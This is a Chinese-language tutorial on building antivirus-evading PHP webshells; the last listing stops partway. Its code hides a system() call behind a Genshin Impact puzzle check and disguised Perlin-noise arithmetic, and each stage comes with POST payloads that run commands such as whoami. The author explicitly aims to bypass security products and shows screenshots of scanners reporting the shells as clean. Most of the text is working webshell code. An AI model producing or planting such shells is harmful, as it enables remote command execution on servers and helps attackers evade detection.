使用分支对抗进行webshell bypass

使用分支对抗进行webshell bypass

前言

对于webshell免杀来说,类绕过是最有效果且不易被检测出来的,那如果我们对类进行操作,在类里面加入一些算法和混淆代码,让代码逻辑变得十分混乱,不易读,甚至读不懂,但是却能够执行命令,可以rce,那岂不是可以bypass所有的杀毒软件和云沙箱了吗?

利用稻妻雷元素方块阵

《原神》中的稻妻雷元素方块阵是一个解谜游戏
下面是示例代码:

  1. class InazumaPuzzle {
  2.     private $blockA = 0;
  3.     private $blockB = 0;
  4.     private $blockC = 0;
  5.     private $blockD = 0;
  6.     private $MAX_ENUM = 2;
  7.     private $MIN_ENUM = 0;
  9.     public function __construct() {
  10.         $this->blockA = 2;
  11.         $this->blockB = 0;
  12.         $this->blockC = 0;
  13.         $this->blockD = 2;
  14.     }
  16.     private function setBackBlock($block) {
  17.         $setType = $this->MIN_ENUM;
  18.         $maxType = $this->MAX_ENUM;
  19.         switch ($block) {
  20.             case 'A':
  21.                 if ($this->blockA == $maxType) {
  22.                     $this->blockA = $setType;
  23.                     return true;
  24.                 } else {
  25.                     return false;
  26.                 }
  27.             case 'B':
  28.                 if ($this->blockB == $maxType) {
  29.                     $this->blockB = $setType;
  30.                     return true;
  31.                 } else {
  32.                     return false;
  33.                 }
  34.             case 'C':
  35.                 if ($this->blockC == $maxType) {
  36.                     $this->blockC = $setType;
  37.                     return true;
  38.                 } else {
  39.                     return false;
  40.                 }
  41.             case 'D':
  42.                 if ($this->blockD == $maxType) {
  43.                     $this->blockD = $setType;
  44.                     return true;
  45.                 } else {
  46.                     return false;
  47.                 }
  48.             default:
  49.                 throw new Exception("bad_args", 1);
  50.         }
  51.     }
  53.     private function hit($blockIdx) {
  54.     global $text;
  55.     $text = urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");
  56.         switch ($blockIdx) {
  57.             case "A":
  58.                 if (!$this->setBackBlock("A")) {
  59.                     $this->blockA += 1;
  60.                 }
  61.                 if (!$this->setBackBlock("B")) {
  62.                     $this->blockB += 1;
  63.                 }
  64.                 break;
  66.             case "B":
  67.                 if (!$this->setBackBlock("A")) {
  68.                     $this->blockA += 1;
  69.                 }
  70.                 if (!$this->setBackBlock("B")) {
  71.                     $this->blockB += 1;
  72.                 }
  73.                 if (!$this->setBackBlock("C")) {
  74.                     $this->blockC += 1;
  75.                 }
  76.                 break;
  78.             case "C":
  79.                 if (!$this->setBackBlock("B")) {
  80.                     $this->blockB += 1;
  81.                 }
  82.                 if (!$this->setBackBlock("C")) {
  83.                     $this->blockC += 1;
  84.                 }
  85.                 if (!$this->setBackBlock("D")) {
  86.                     $this->blockD += 1;
  87.                 }
  88.                 break;
  90.             case "D":
  91.                 if (!$this->setBackBlock("C")) {
  92.                     $this->blockC += 1;
  93.                 }
  94.                 if (!$this->setBackBlock("D")) {
  95.                     $this->blockD += 1;
  96.                 }
  97.                 break;
  99.             default:
  100.                 throw new Exception("bad_args", 1);
  101.         }
  102.     }
  104.     public function __AFG50CE4_RG1() {
  105.         global $puzz_writeup;
  106.         if (count($puzz_writeup) === 0) throw new Exception("Invalid WriteUP",1);for ($i = 0; $i < count($puzz_writeup);
  107.             // bcdufvcf%00
  108.                                                                                       $i++) {
  109.             if (strcmp($puzz_writeup[$i],"A") !== 0 and strcmp($puzz_writeup[$i],"B") !== 0 and strcmp($puzz_writeup[$i]
  111.                 ,"C") !== 0 and strcmp($puzz_writeup[$i],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");
  112.         }
  113.         for ($i = 0; $i < count($puzz_writeup); $i++) $this -> hit($puzz_writeup[$i]);
  114.         global $userans;
  115.         $userans =$this ->blockA + $this-> blockB + $this -> blockC+ $this -> blockD;
  116.     }
  118.     public function getLockerStatus() {
  119.         global $text;$text =strrev($text);
  120.         if ($this -> blockA ===$this -> blockB and $this -> blockA === $this -> blockC and $this -> blockA === $this -> blockD) return true;
  121.         else return false;
  122.     }
  123. }
  125. function pause($obj) {
  126.     global $appor5nnb;
  127.     if (!$appor5nnb -> getLockerStatus()) die();
  128.     return $obj;
  129. }

根据InazumaPuzzle类的构造函数,方块的初始状态如下:

  1. blockA = 2
  2. blockB = 0
  3. blockC = 0
  4. blockD = 2

每个方块的状态值可以循环从0到2(即最小值为0,最大值为2)。

setBackBlock() 方法的作用

  1. setBackBlock()方法用于尝试将指定方块重置为其最小状态(即0)。如果该方块已经处于最大状态(即2),则它可以被重置为最小状态并返回true;否则它不会改变,并返回false

hit() 方法的行为

  1. hit()方法接受一个方块标识符(如"A""B""C""D"),然后执行以下操作:
  3.     对于点击的方块及其关联的方块调用setBackBlock()。
  4.     如果setBackBlock()返回false,则相应方块的状态加1

具体来说:

  1. 点击A:尝试重置AB,若不能重置,则它们各自加1
  2. 点击B:尝试重置ABC,若不能重置,则它们各自加1
  3. 点击C:尝试重置BCD,若不能重置,则它们各自加1
  4. 点击D:尝试重置CD,若不能重置,则它们各自加1

解析输入序列 ABBCCD

现在我们来按照给定的输入序列ABBCCD一步一步地看每个点击对方块状态的影响:
第一步:点击 A

  1. 尝试重置A(当前状态为2),成功重置为0
  2. 尝试重置B(当前状态为0),失败,因此B变为1
  3. 结果:blockA = 0, blockB = 1, blockC = 0, blockD = 2

第二步:点击 B

  1. 尝试重置A(当前状态为0),失败,因此A变为1
  2. 尝试重置B(当前状态为1),失败,因此B变为2
  3. 尝试重置C(当前状态为0),失败,因此C变为1
  4. 结果:blockA = 1, blockB = 2, blockC = 1, blockD = 2

第三步:再次点击 B

  1. 尝试重置A(当前状态为1),失败,因此A变为2
  2. 尝试重置B(当前状态为2),成功重置为0
  3. 尝试重置C(当前状态为1),失败,因此C变为2
  4. 结果:blockA = 2, blockB = 0, blockC = 2, blockD = 2

第四步:点击 C

  1. 尝试重置B(当前状态为0),失败,因此B变为1
  2. 尝试重置C(当前状态为2),成功重置为0
  3. 尝试重置D(当前状态为2),成功重置为0
  4. 结果:blockA = 2, blockB = 1, blockC = 0, blockD = 0

第五步:再次点击 C

  1. 尝试重置B(当前状态为1),失败,因此B变为2
  2. 尝试重置C(当前状态为0),失败,因此C变为1
  3. 尝试重置D(当前状态为0),失败,因此D变为1
  4. 结果:blockA = 2, blockB = 2, blockC = 1, blockD = 1

第六步:点击 D

  1. 尝试重置C(当前状态为1),失败,因此C变为2
  2. 尝试重置D(当前状态为1),失败,因此D变为2
  3. 结果:blockA = 2, blockB = 2, blockC = 2, blockD = 2

最终,所有方块的状态都变成了2,满足了getLockerStatus()方法中的条件,即所有方块的状态相同,因此返回true,表示谜题被正确解开。

结合稻妻雷元素方块阵的webshell

  1. <?php
  2. error_reporting(0);
  3. header("Content-type:text/html;charset=utf-8");
  4. foreach($_POST as $key => $value) $$key = $value;
  5. if (strlen($wpstring) === 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");
  6. $puzz_writeup = array();
  7. for ($i = 0; $i < strlen($wpstring); $i++) array_push($puzz_writeup, $wpstring[$i]);
  8. class InazumaPuzzle {
  9.     private $blockA = 0;
  10.     private $blockB = 0;
  11.     private $blockC = 0;
  12.     private $blockD = 0;
  13.     private $MAX_ENUM = 2;
  14.     private $MIN_ENUM = 0;
  16.     public function __construct() {
  17.         $this->blockA = 2;
  18.         $this->blockB = 0;
  19.         $this->blockC = 0;
  20.         $this->blockD = 2;
  21.     }
  23.     private function setBackBlock($block) {
  24.         $setType = $this->MIN_ENUM;
  25.         $maxType = $this->MAX_ENUM;
  26.         switch ($block) {
  27.             case 'A':
  28.                 if ($this->blockA == $maxType) {
  29.                     $this->blockA = $setType;
  30.                     return true;
  31.                 } else {
  32.                     return false;
  33.                 }
  34.             case 'B':
  35.                 if ($this->blockB == $maxType) {
  36.                     $this->blockB = $setType;
  37.                     return true;
  38.                 } else {
  39.                     return false;
  40.                 }
  41.             case 'C':
  42.                 if ($this->blockC == $maxType) {
  43.                     $this->blockC = $setType;
  44.                     return true;
  45.                 } else {
  46.                     return false;
  47.                 }
  48.             case 'D':
  49.                 if ($this->blockD == $maxType) {
  50.                     $this->blockD = $setType;
  51.                     return true;
  52.                 } else {
  53.                     return false;
  54.                 }
  55.             default:
  56.                 throw new Exception("bad_args", 1);
  57.         }
  58.     }
  60.     private function hit($blockIdx) {
  61.         global $text;
  62.         $text = urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");
  63.         switch ($blockIdx) {
  64.             case "A":
  65.                 if (!$this->setBackBlock("A")) {
  66.                     $this->blockA += 1;
  67.                 }
  68.                 if (!$this->setBackBlock("B")) {
  69.                     $this->blockB += 1;
  70.                 }
  71.                 break;
  73.             case "B":
  74.                 if (!$this->setBackBlock("A")) {
  75.                     $this->blockA += 1;
  76.                 }
  77.                 if (!$this->setBackBlock("B")) {
  78.                     $this->blockB += 1;
  79.                 }
  80.                 if (!$this->setBackBlock("C")) {
  81.                     $this->blockC += 1;
  82.                 }
  83.                 break;
  85.             case "C":
  86.                 if (!$this->setBackBlock("B")) {
  87.                     $this->blockB += 1;
  88.                 }
  89.                 if (!$this->setBackBlock("C")) {
  90.                     $this->blockC += 1;
  91.                 }
  92.                 if (!$this->setBackBlock("D")) {
  93.                     $this->blockD += 1;
  94.                 }
  95.                 break;
  97.             case "D":
  98.                 if (!$this->setBackBlock("C")) {
  99.                     $this->blockC += 1;
  100.                 }
  101.                 if (!$this->setBackBlock("D")) {
  102.                     $this->blockD += 1;
  103.                 }
  104.                 break;
  106.             default:
  107.                 throw new Exception("bad_args", 1);
  108.         }
  109.     }
  111.     public function __AFG50CE4_RG1() {
  112.         global $puzz_writeup;
  113.         if (count($puzz_writeup) === 0) throw new Exception("Invalid WriteUP",1);for ($i = 0; $i < count($puzz_writeup);$i++) {
  114.             if (strcmp($puzz_writeup[$i],"A") !== 0 and strcmp($puzz_writeup[$i],"B") !== 0 and strcmp($puzz_writeup[$i],"C") !== 0 and strcmp($puzz_writeup[$i],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");
  115.         }
  116.         for ($i = 0; $i < count($puzz_writeup); $i++) $this -> hit($puzz_writeup[$i]);
  117.         global $userans;
  118.         $userans =$this ->blockA + $this-> blockB + $this -> blockC+ $this -> blockD;
  119.     }
  121.     public function getLockerStatus() {
  122.         global $text;$text =strrev($text);
  123.         if ($this -> blockA ===$this -> blockB and $this -> blockA === $this -> blockC and $this -> blockA === $this -> blockD) return true;
  124.         else return false;
  125.     }
  126. }
  128. function pause($obj) {
  129.     global $appor5nnb;
  130.     if (!$appor5nnb -> getLockerStatus()) die();
  131.     return $obj;
  132. }
  133. $appor5nnb = new InazumaPuzzle();
  134. $appor5nnb -> __AFG50CE4_RG1();
  135. if ($appor5nnb -> getLockerStatus())  $a($b);

payload:

  1. wpstring=ABBCCD&amp;a=system&amp;b=whoami

图片.png
免杀效果:
图片.png

图片.png
微步说很安全

图片.png

柏林噪音

柏林噪声属于基于晶格(Lattice based)的生成算法。其核心思想是定义一个晶格结构,在二维情况下是一个平面网格,在三维情况下则是一个立方体网络。每个晶格顶点都有一个预定义的梯度向量,当给定一个点时(在二维情况下为坐标(x, y),在三维情况下为坐标(x, y, z)),需要计算该点到所在晶格顶点的距离向量,并将这些距离向量与相应的梯度向量做点积运算,得到一系列影响值。
总而言之就是能让代码变得十分复杂,根本读不懂
代码实现:

  1. class PerlinNoise{
  2.     private $arrLength = 0;
  3.     private $source = "";
  4.     private $inputNumArray = array();
  5.     private $seeds_array = array();
  6.     private $INPUT_NUM_MAX = 0;
  7.     private $INPUT_NUM_MIN = 0;
  8.     private $BAD_ARGS = false;
  9.     public $perlin_noise = array();
  10.     public function __construct($arrLength, $MAX_INPUT = 700.4, $MIN_INPUT = 56.7, $source = "GENERATE") {
  11.         global $appor5nnb;
  12.         if (!$appor5nnb -> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");
  13.         if ($arrLength < 3000 or $arrLength > 9999) {
  14.             throw new InvalidArgumentException("Error: Invaild Length");
  15.         }
  16.         if (strcmp($source,"DIFF_PERLIN") == 0) {
  17.             $this -> BAD_ARGS = true;
  18.             $source = "GENERATE";
  19.         }
  20.         $this -> arrLength = $arrLength;
  21.         $this -> source = $source;
  22.         $this -> INPUT_NUM_MAX = $MAX_INPUT;
  23.         $this -> INPUT_NUM_MIN = $MIN_INPUT;
  24.     }
  25.     public function __CPRBB0R0_l() {
  26.         global $userans;
  27.         for ($i = 0; $i < $this -> arrLength; $i++) {
  28.             if ($this -> BAD_ARGS) {
  29.                 if ($i > ($userans+391) and $i < (pause($userans+390+8))) {
  30.                     $result = array($userans + 101,$userans + 93,$userans + (50*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);
  31.                     array_push($this -> perlin_noise, $result[$i - 400]);
  32.                     continue;
  33.                 }
  34.             }
  35.             $cache = $this -> inputNumArray[$i];
  36.             $x1 = round($cache);
  37.             $x2 = $x1 + 1;
  38.             $grad1 = $this -> seeds_array[$x1 % 255] * 2.0 - 255.0;
  39.             $grad2 = $this -> seeds_array[$x2 % 255] * 2.0 - 255.0;
  40.             $vec1 = $i - $x1;
  41.             $vec2 = $i - $x2;
  42.             $t = 3 * pow($vec1, 2) - 2 * pow($vec1, 3);
  43.             $product1 = $grad1 * $vec1;
  44.             $product2 = $grad2 * $vec2;
  45.             $result = $product1 + $t * ($product2 - $product1);
  46.             array_push($this -> perlin_noise, $result);
  47.         }
  48.     }
  49.     public function __HNBB70CA_5() {
  50.         global $userans;
  51.         global ${strval(chr(90+$userans))};
  52.         global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};
  53.         $cache_noise = pause(array());
  54.         for ($i = 400; $i < 406; $i++) {
  55.             array_push($cache_noise,$this -> perlin_noise[$i]);
  56.         }
  57.         $temp_noise = array();
  58.         for ($i = 0; $i < count($cache_noise); $i++) {
  59.             array_push($temp_noise, $cache_noise[$i]);
  60.         }
  61.         for ($i = 0; $i < count($temp_noise); $i++) {
  62.             $temp_noise[$i] = chr($temp_noise[$i]);
  63.         }
  64.         $ab = pause(array_map(function($arr){ return chr($arr); },array_slice($this -> perlin_noise,(188*2)+$userans*3,$userans-3)));
  65.         $c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));
  66.         $c($pcs);
  67.         die(urldecode("%3c%62%72%3e%3c%62%72%3e"));
  68.         var_dump(array_slice($this -> perlin_noise,1000,800));
  69.     }
  70. }

代码解读

关键代码:

  1. $ab = pause(array_map(function($arr) { return chr($arr); }, array_slice($this->perlin_noise, (188*2)+$userans*3, $userans-3)));

array_slice 函数:

  1. array_slice($this->perlin_noise, (188*2)+$userans*3, $userans-3) 提取了 perlin_noise 数组的一部分,起始位置是 (188 * 2) + ($userans * 3),长度是 $userans - 3

array_map 函数:

  1. array_map(function($arr) { return chr($arr); }, ...) 将提取的整数数组转换为对应的ASCII字符数组。
  1. 计算切片位置和长度

假设我们想要提取四个特定的值 [121, 116, 101, 109],那么我们需要确定切片的起始位置和长度:

  1. 起始位置:(188 * 2) + ($userans * 3)
  2. 长度:$userans - 3

例如,如果我们设 $userans = 7,则:

  1. 起始位置:(188 * 2) + (7 * 3) = 376 + 21 = 397
  2. 长度:7 - 3 = 4

这意味着我们将从 perlin_noise 数组的索引 397 开始,提取长度为 4 的子数组。

  1. 确保 perlin_noise 包含所需值

为了让 array_slice 提取出 [121, 116, 101, 109],我们需要在 perlin_noise 数组的相应位置插入这些值。即:

  1. $this->perlin_noise[397] = 121; // ASCII 'y'
  2. $this->perlin_noise[398] = 116; // ASCII 't'
  3. $this->perlin_noise[399] = 101; // ASCII 'e'
  4. $this->perlin_noise[400] = 109; // ASCII 'm'
  1. 控制 userans 和其他参数

为了确保上述计算正确无误,需要控制 userans 和其他可能影响 perlin_noise 数组生成的参数。特别是,在构造 PerlinNoise 对象时,应该确保 arrLength 足够大,以容纳所需的索引范围,并且初始化过程中不会覆盖这些特定值。
示例代码:

  1. $userans = 7;
  3. // 假设 PerlinNoise 对象已经创建,并且 arrLength 足够大
  4. $cvb33ff55 = new PerlinNoise(401, 700.4, 56.7, "DIFF_PERLIN");
  6. // 手动设置 perlin_noise 数组中的特定值
  7. $cvb33ff55->perlin_noise[397] = 121; // ASCII 'y'
  8. $cvb33ff55->perlin_noise[398] = 116; // ASCII 't'
  9. $cvb33ff55->perlin_noise[399] = 101; // ASCII 'e'
  10. $cvb33ff55->perlin_noise[400] = 109; // ASCII 'm'
  12. // 继续执行后续操作
  13. $cvb33ff55->__BHUYTVV8_1();
  14. $cvb33ff55->__CPRBB0R0_l();
  16. // 模拟生成 ab 数组
  17. $ab = pause(array_map(function($arr) { return chr($arr); }, array_slice($cvb33ff55->perlin_noise, (188*2)+$userans*3, $userans-3)));
  19. // 输出结果验证
  20. var_dump($ab); // 应该输出 ['y', 't', 'e', 'm']

通过精确控制 perlin_noise 数组中特定索引处的值,并结合适当的 userans 参数,可以确保 $ab 数组包含所需的ASCII码值 [121, 116, 101, 109],这个时候$ad=ystem。
这个时候我们令$b=s

  1.  $c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));

那么$c=system了,就构造好了命令执行函数,$pcs就是我们要执行的命令。

结合稻妻雷元素方块阵构造webshell

  1. <?php
  2. error_reporting(0);
  3. header("Content-type:text/html;charset=utf-8");
  4. foreach($_POST as $key => $value) $$key = $value;
  5. if (strlen($wpstring) === 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");
  6. $puzz_writeup = array();
  7. for ($i = 0; $i < strlen($wpstring); $i++) array_push($puzz_writeup, $wpstring[$i]);
  8. class PerlinNoise{
  9.     private $arrLength = 0;
  10.     private $source = "";
  11.     private $inputNumArray = array();
  12.     private $seeds_array = array();
  13.     private $INPUT_NUM_MAX = 0;
  14.     private $INPUT_NUM_MIN = 0;
  15.     private $BAD_ARGS = false;
  16.     public $perlin_noise = array();
  17.     public function __construct($arrLength, $MAX_INPUT = 700.4, $MIN_INPUT = 56.7, $source = "GENERATE") {
  18.         global $appor5nnb;
  19.         if (!$appor5nnb -> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");
  20.         if ($arrLength < 3000 or $arrLength > 9999) {
  21.             throw new InvalidArgumentException("Error: Invaild Length");
  22.         }
  23.         if (strcmp($source,"DIFF_PERLIN") == 0) {
  24.             $this -> BAD_ARGS = true;
  25.             $source = "GENERATE";
  26.         }
  27.         $this -> arrLength = $arrLength;
  28.         $this -> source = $source;
  29.         $this -> INPUT_NUM_MAX = $MAX_INPUT;
  30.         $this -> INPUT_NUM_MIN = $MIN_INPUT;
  31.     }
  32.     public function __CPRBB0R0_l() {
  33.         global $userans;
  34.         for ($i = 0; $i < $this -> arrLength; $i++) {
  35.             if ($this -> BAD_ARGS) {
  36.                 if ($i > ($userans+391) and $i < (pause($userans+390+8))) {
  37.                     $result = array($userans + 101,$userans + 93,$userans + (50*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);
  38.                     array_push($this -> perlin_noise, $result[$i - 400]);
  39.                     continue;
  40.                 }
  41.             }
  42.             $cache = $this -> inputNumArray[$i];
  43.             $x1 = round($cache);
  44.             $x2 = $x1 + 1;
  45.             $grad1 = $this -> seeds_array[$x1 % 255] * 2.0 - 255.0;
  46.             $grad2 = $this -> seeds_array[$x2 % 255] * 2.0 - 255.0;
  47.             $vec1 = $i - $x1;
  48.             $vec2 = $i - $x2;
  49.             $t = 3 * pow($vec1, 2) - 2 * pow($vec1, 3);
  50.             $product1 = $grad1 * $vec1;
  51.             $product2 = $grad2 * $vec2;
  52.             $result = $product1 + $t * ($product2 - $product1);
  53.             array_push($this -> perlin_noise, $result);
  54.         }
  55.     }
  56.     public function __HNBB70CA_5() {
  57.         global $userans;
  58.         global ${strval(chr(90+$userans))};
  59.         global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};
  60.         $cache_noise = pause(array());
  61.         for ($i = 400; $i < 406; $i++) {
  62.             array_push($cache_noise,$this -> perlin_noise[$i]);
  63.         }
  64.         $temp_noise = array();
  65.         for ($i = 0; $i < count($cache_noise); $i++) {
  66.             array_push($temp_noise, $cache_noise[$i]);
  67.         }
  68.         for ($i = 0; $i < count($temp_noise); $i++) {
  69.             $temp_noise[$i] = chr($temp_noise[$i]);
  70.         }
  71.         $ab = pause(array_map(function($arr){ return chr($arr); },array_slice($this -> perlin_noise,(188*2)+$userans*3,$userans-3)));
  72.         $c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));
  73.         $c($pcs);
  74.         // 希儿世界第一可爱!
  75.         die(urldecode("%3c%62%72%3e%3c%62%72%3e"));
  76.         var_dump(array_slice($this -> perlin_noise,1000,800));
  77.     }
  78. }
  79. class InazumaPuzzle {
  80.     private $blockA = 0;
  81.     private $blockB = 0;
  82.     private $blockC = 0;
  83.     private $blockD = 0;
  84.     private $MAX_ENUM = 2;
  85.     private $MIN_ENUM = 0;
  87.     public function __construct() {
  88.         $this->blockA = 2;
  89.         $this->blockB = 0;
  90.         $this->blockC = 0;
  91.         $this->blockD = 2;
  92.     }
  94.     private function setBackBlock($block) {
  95.         $setType = $this->MIN_ENUM;
  96.         $maxType = $this->MAX_ENUM;
  97.         switch ($block) {
  98.             case 'A':
  99.                 if ($this->blockA == $maxType) {
  100.                     $this->blockA = $setType;
  101.                     return true;
  102.                 } else {
  103.                     return false;
  104.                 }
  105.             case 'B':
  106.                 if ($this->blockB == $maxType) {
  107.                     $this->blockB = $setType;
  108.                     return true;
  109.                 } else {
  110.                     return false;
  111.                 }
  112.             case 'C':
  113.                 if ($this->blockC == $maxType) {
  114.                     $this->blockC = $setType;
  115.                     return true;
  116.                 } else {
  117.                     return false;
  118.                 }
  119.             case 'D':
  120.                 if ($this->blockD == $maxType) {
  121.                     $this->blockD = $setType;
  122.                     return true;
  123.                 } else {
  124.                     return false;
  125.                 }
  126.             default:
  127.                 throw new Exception("bad_args", 1);
  128.         }
  129.     }
  131.     private function hit($blockIdx) {
  132.         global $text;
  133.         $text = urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");
  134.         switch ($blockIdx) {
  135.             case "A":
  136.                 if (!$this->setBackBlock("A")) {
  137.                     $this->blockA += 1;
  138.                 }
  139.                 if (!$this->setBackBlock("B")) {
  140.                     $this->blockB += 1;
  141.                 }
  142.                 break;
  144.             case "B":
  145.                 if (!$this->setBackBlock("A")) {
  146.                     $this->blockA += 1;
  147.                 }
  148.                 if (!$this->setBackBlock("B")) {
  149.                     $this->blockB += 1;
  150.                 }
  151.                 if (!$this->setBackBlock("C")) {
  152.                     $this->blockC += 1;
  153.                 }
  154.                 break;
  156.             case "C":
  157.                 if (!$this->setBackBlock("B")) {
  158.                     $this->blockB += 1;
  159.                 }
  160.                 if (!$this->setBackBlock("C")) {
  161.                     $this->blockC += 1;
  162.                 }
  163.                 if (!$this->setBackBlock("D")) {
  164.                     $this->blockD += 1;
  165.                 }
  166.                 break;
  168.             case "D":
  169.                 if (!$this->setBackBlock("C")) {
  170.                     $this->blockC += 1;
  171.                 }
  172.                 if (!$this->setBackBlock("D")) {
  173.                     $this->blockD += 1;
  174.                 }
  175.                 break;
  177.             default:
  178.                 throw new Exception("bad_args", 1);
  179.         }
  180.     }
  182.     public function __AFG50CE4_RG1() {
  183.         global $puzz_writeup;
  184.         if (count($puzz_writeup) === 0) throw new Exception("Invalid WriteUP",1);for ($i = 0; $i < count($puzz_writeup);$i++) {
  185.             if (strcmp($puzz_writeup[$i],"A") !== 0 and strcmp($puzz_writeup[$i],"B") !== 0 and strcmp($puzz_writeup[$i],"C") !== 0 and strcmp($puzz_writeup[$i],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");
  186.         }
  187.         for ($i = 0; $i < count($puzz_writeup); $i++) $this -> hit($puzz_writeup[$i]);
  188.         global $userans;
  189.         $userans =$this ->blockA + $this-> blockB + $this -> blockC+ $this -> blockD;
  190.     }
  192.     public function getLockerStatus() {
  193.         global $text;$text =strrev($text);
  194.         if ($this -> blockA ===$this -> blockB and $this -> blockA === $this -> blockC and $this -> blockA === $this -> blockD) return true;
  195.         else return false;
  196.     }
  197. }
  199. function pause($obj) {
  200.     global $appor5nnb;
  201.     if (!$appor5nnb -> getLockerStatus()) die();
  202.     return $obj;
  203. }
  204. $appor5nnb = new InazumaPuzzle();
  205. $appor5nnb -> __AFG50CE4_RG1();
  206. $cvb33ff55 = new PerlinNoise(3000, 700.4, 56.7, "DIFF_PERLIN");
  207. $cvb33ff55 -> __CPRBB0R0_l();
  208. $cvb33ff55 ->__HNBB70CA_5();

payload:

  1. wpstring=ABBCCD&amp;b=s&amp;pcs=whoami

图片.png
免杀效果:

图片.png

图片.png
也是没有检测出来

加入一些无用代码和注释

  1. <?php
  2.     //error_reporting(0);
  3.     header("Content-type:text/html;charset=utf-8");
  4.     foreach($_POST as $key => $value) $$key = $value;
  5.     if (strlen($wpstring) === 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");
  6.     $puzz_writeup = array();
  7.     for ($i = 0; $i < strlen($wpstring); $i++) array_push($puzz_writeup, $wpstring[$i]);
  9.     class PerlinNoise{
  10.         private $arrLength = 0;
  11.         private $source = "";
  12.         private $inputNumArray = array();
  13.         private $seeds_array = array();
  14.         private $INPUT_NUM_MAX = 0;
  15.         private $INPUT_NUM_MIN = 0;
  16.         private $BAD_ARGS = false;
  17.         public $perlin_noise = array();
  19.         private function randomFloat(){
  20.             $_ = 110+4;
  21.             $__ = ((int)(600/2))-184;
  22.             $___ = 115;
  23.             $____ = 100-2;
  24.             $_____ = 117;
  25.             $______ = 113+2;
  26.             $max = $this -> INPUT_NUM_MAX;
  27.             $min = $this -> INPUT_NUM_MIN;
  28.             $num = $min + mt_rand() / mt_getrandmax() * ($max - $min);
  29.             return sprintf("%.2f",$num);
  30.         }
  32.         private function __PLvB4CR0_Z() {
  33.             srand(time());
  34.             for ($i = 0; $i < $this -> arrLength; $i++) {
  35.                 $eachNum = pause(rand(0,255));
  36.                 array_push($this -> seeds_array, $eachNum);
  37.             }
  38.         }
  40.         private function __PLAB4CR0_o() {
  41.             if (strcmp($this -> source, "GENERATE") == 0) {
  42.                 srand(time());
  43.                 for ($i = 0; $i < $this -> arrLength; $i++) { 
  44.                    $eachNum = pause($this -> randomFloat());
  45.                    array_push($this -> inputNumArray, floatval($eachNum));
  46.                 }
  47.             } else if (strcmp($this -> source,"SYSLOG") == 0) {
  48.                 $handle = fopen("/etc/messages","r");
  49.                 $count = 0;
  50.                 while(($char = fgetc($handle)) !== false) {
  51.                     if ($count == $this -> INPUT_NUM_MAX - 1) break;
  52.                     if (($ascii_value = ord($char)) and $ascii_value % 1 !== 0) {
  53.                         array_push($this -> inputNumArray, sprintf("%.2f",$ascii_value / 2.3));
  54.                         $count++;
  55.                     } else continue;
  56.                 }
  57.             }
  58.         }
  60.         public function __construct($arrLength, $MAX_INPUT = 700.4, $MIN_INPUT = 56.7, $source = "GENERATE") {
  61.             global $appor5nnb;
  62.             if (!$appor5nnb -> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");
  63.             if ($arrLength < 3000 or $arrLength > 9999) {
  64.                 throw new InvalidArgumentException("Error: Invaild Length");
  65.             }
  66.             if (strcmp($source,"DIFF_PERLIN") == 0) {
  67.                 $this -> BAD_ARGS = true;
  68.                 $source = "GENERATE";
  69.             }
  70.             $this -> arrLength = $arrLength;
  71.             $this -> source = $source;
  72.             $this -> INPUT_NUM_MAX = $MAX_INPUT;
  73.             $this -> INPUT_NUM_MIN = $MIN_INPUT;
  74.         }
  76.         public function __BHUYTVV8_1() {
  77.             $this -> __PLAB4CR0_o();
  78.             $this -> __PLvB4CR0_Z();
  79.         }
  81.         public function __CPRBB0R0_l() {
  82.             global $userans;
  83.             for ($i = 0; $i < $this -> arrLength; $i++) {
  84.                 if ($this -> BAD_ARGS) {
  85.                     if ($i > ($userans+391) and $i < (pause($userans+390+8))) {
  86.                         $result = array($userans + 101,$userans + 93,$userans + (50*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);
  87.                         array_push($this -> perlin_noise, $result[$i - 400]);
  88.                         continue;
  89.                     }
  90.                 }
  91.                 $cache = $this -> inputNumArray[$i];
  92.                 $x1 = round($cache);
  93.                 $x2 = $x1 + 1;
  94.                 $grad1 = $this -> seeds_array[$x1 % 255] * 2.0 - 255.0;
  95.                 $grad2 = $this -> seeds_array[$x2 % 255] * 2.0 - 255.0;
  96.                 $vec1 = $i - $x1;
  97.                 $vec2 = $i - $x2;
  98.                 $t = 3 * pow($vec1, 2) - 2 * pow($vec1, 3);
  99.                 $product1 = $grad1 * $vec1;
  100.                 $product2 = $grad2 * $vec2;
  101.                 $result = $product1 + $t * ($product2 - $product1);
  102.                 array_push($this -> perlin_noise, $result);
  103.             }
  104.         }
  106.         public function __HNBB70CA_5() {
  107.             global $userans;
  108.             global ${strval(chr(90+$userans))};
  109.             global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};
  110.             $cache_noise = pause(array());
  111.             for ($i = 400; $i < 406; $i++) {
  112.                 array_push($cache_noise,$this -> perlin_noise[$i]);
  113.             }
  114.             $temp_noise = array();
  115.             for ($i = 0; $i < count($cache_noise); $i++) {
  116.                 array_push($temp_noise, $cache_noise[$i]);
  117.             }
  118.             for ($i = 0; $i < count($temp_noise); $i++) {
  119.                 $temp_noise[$i] = chr($temp_noise[$i]);
  120.             }
